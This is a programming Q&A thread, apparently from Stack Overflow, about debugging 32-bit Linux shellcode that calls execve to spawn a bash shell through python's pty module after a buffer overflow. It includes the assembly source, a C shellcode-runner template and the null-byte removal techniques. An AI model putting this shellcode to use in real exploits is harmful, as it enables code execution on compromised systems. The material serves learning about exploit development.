1

Update: I have fixed the argv array pointers not being valid causing the continuous loop and have updated the assembly code. Now the only issue is the disappearing space char on compilation.

I've been experimenting with executing shellcode after exploiting a buffer overflow on a 32-bit Linux VM. My assembly program simply uses execve to start a shell via python (I wanted to test passing arguments in execve and not just run /bin/bash), and when I compile the .asm into a program it runs fine, however not when I use it as shellcode. In order to get it to run as shellcode, I know I need to remove null bytes so that they aren't parsed as null terminators that cut my string off early.

For the sake of testing, I am using a template C program for executing shellcode:

#include <stdio.h>

unsigned char code[] = "shellcodegoeshere"

int main(int argc, char **argv) {
    int (*ret)() = (int(*)())code;
    ret();
}

I changed the relative addressing in my program so that it instead uses offsets from esi when data is popped, replaced any null's with "N" to be replaced in runtime, and moved 0 into those locations by xor'ing a register by itself and moving it's value at those offsets.

My original program is this:

global _start
section .text

_start:
    jmp short call_shellcode

shellcode:
    pop esi
        lea ebx, [rel arg1]
    lea ecx, [rel args]
    xor edx, edx
        xor eax, eax
    mov eax, 0xb
    int 0x80

call_shellcode:
    call shellcode

    arg1 db "/usr/bin/python",0
    arg2 db "-c",0
    arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")",0

    args dd arg1, arg2, arg3, 0

and this is what it looks like after I try taking away the null bytes:

global _start
section .text

_start:
    jmp short call_shellcode

shellcode:
    pop esi
    xor eax, eax
    mov byte [esi+15], al
    mov byte [esi+18], al
    mov byte [esi+53], al
    mov dword [esi+53+4*3], eax
    lea ebx, [esi]
    ;lea ecx, [esi+54] (couldn't be accessed via shellcode)
    xor ecx, ecx
    push ecx
    lea ecx, [esi+19] ; now will make an array of pointers that can still be accessed via shellcode
    push ecx
    lea ecx, [esi+16]
    push ecx
    lea ecx, [esi]
    push ecx
    mov ecx, esp
    xor edx, edx
    mov al, 0xb
    int 0x80

call_shellcode:
    call shellcode

    arg1 db "/usr/bin/pythonN"
    arg2 db "-cN"
    arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")N"

    ;args dd arg1, arg2, arg3, "NNNN" (these addresses were set at compilation meaning they were no longer valid when in shellcode)

When looking at my original program, reading from esi looks like this before the execve call:

enter image description here

However in my modified shellcode with no null bytes, reading from esi looks like this before and after replacing chars, prior to the execve call:

Before:

enter image description here

After:

enter image description here

As you can see, for some reason the space between the "import pty" disappears, the 0x20 is even missing in the shellcode when I look at it byte by byte. When this happens, my code reaches the end of main in C and loops again, repeating the shellcode instructions. I've tried manually adding the 0x20 back, and despite the output of checking strings from esi being the same as my working original program, I still seem to get this loop that continuously goes back to the start of main in gdb via a call to my pop instruction as the interrupt doesn't start python successfully:

enter image description here

I know that when the call to execv is successful I shouldn't reach that bottom instruction. Judging by the missing space character I get, and the fact I'm getting a continuous loop even when it's present, I know I've done something wrong going between my original program and this one without null bytes- I just don't know what it is.

This is what I can read from esi just after the pop:

enter image description here

If anybody could help it would be greatly appreciated. Thanks.

11
  • args holds the addresses of each arg at assembly time (constant). You might need to load the args array with each arg at runtime. Commented Mar 3, 2022 at 20:34
  • Would loading them at runtime mean referring to each arg by [esi+xx] as I'm doing to load execve's filename, as that offset will surely stay the same? It would make sense that my original program works when compiled but the shellcode version doesn't, as the addresses in their current form may be no longer relevant... Commented Mar 3, 2022 at 21:02
  • I've loaded them at runtime like suggested and execve now runs, now the only issue is the disappearing space char... Commented Mar 3, 2022 at 21:43
  • 1
    [rel arg1] is only meaningful in 64-bit mode; 32-bit mode doesn't support RIP-relative addressing, so abs is the only possibility. Hence the jmp/call/pop trick, instead of just jmp/lea (with the code after the strings so the LEA can use a negative rel32). Commented Mar 4, 2022 at 9:55
  • 1
    Use strace ./a.out to see what system call you're making. If it doesn't work, use GDB to single-step your asm and find out exactly how your registers / memory got into the wrong state you can see with strace Commented Mar 4, 2022 at 9:56

1 Answer 1

1

Failure to invoke Python

The execve syscall is not working properly because args is populated with constant addresses at assembly-time. args must instead be filled with addresses at runtime. In this case, that can be achieved using addresses relative to esi.

Missing space characters

The space characters aren’t missing; they were never there in the first place. Spaces are how shells separate arguments. execve doesn’t separate arguments with anything, because each argument is its own string somewhere in memory. The fact that your three strings are all consecutive in memory and can be printed as one long string is simply a detail of your implementation, and is not a requirement of execve.

Loop

When the execve syscall fails, execution continues to the next instruction:

call shellcode

If you let this run long enough, you’d get a stack overflow from the number of calls.

Sign up to request clarification or add additional context in comments.

4 Comments

Thanks for the help, I was able to change to relative addresses. However, when mentioning a missing space I wasn't referring to the one between "-c" and "import". I know there are no space chars between the consecutive strings in memory, I wasn't referring to any spaces between execve's args. What I'm referring to is the value of the last arg itself: "import pty; pty.spawn('/bin/bash')". The string itself should contain spaces, there's a space character after the semicolon, but not one after import. Am I making sense or am I missing something?
I misunderstood and missed the actual missing space. I’ll look into it…
I tested your code on my x86 musl-based Linux system and did not see the space disappear. I did replace /usr/bin/python with /bin///////echo, because I don’t have Python installed. In your screenshot, the N at the end of the python script isn’t replaced. Maybe you replaced the wrong character?
The N isn't replaced as my offset is expecting the missing space to be there, so it instead sets null one byte after the N. I tried using /bin///////echo and I still get the same result. I don't think it's a matter of replacing the wrong character either because this space is missing right after I pop esi before any of the mov's are executed (I've updated my question with a screenshot). The missing char shows in objdump too so it's not the shellcode parsing. At least for now I can manually add the 0x20 back into the shellcode, but it's a bit of a janky solution.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.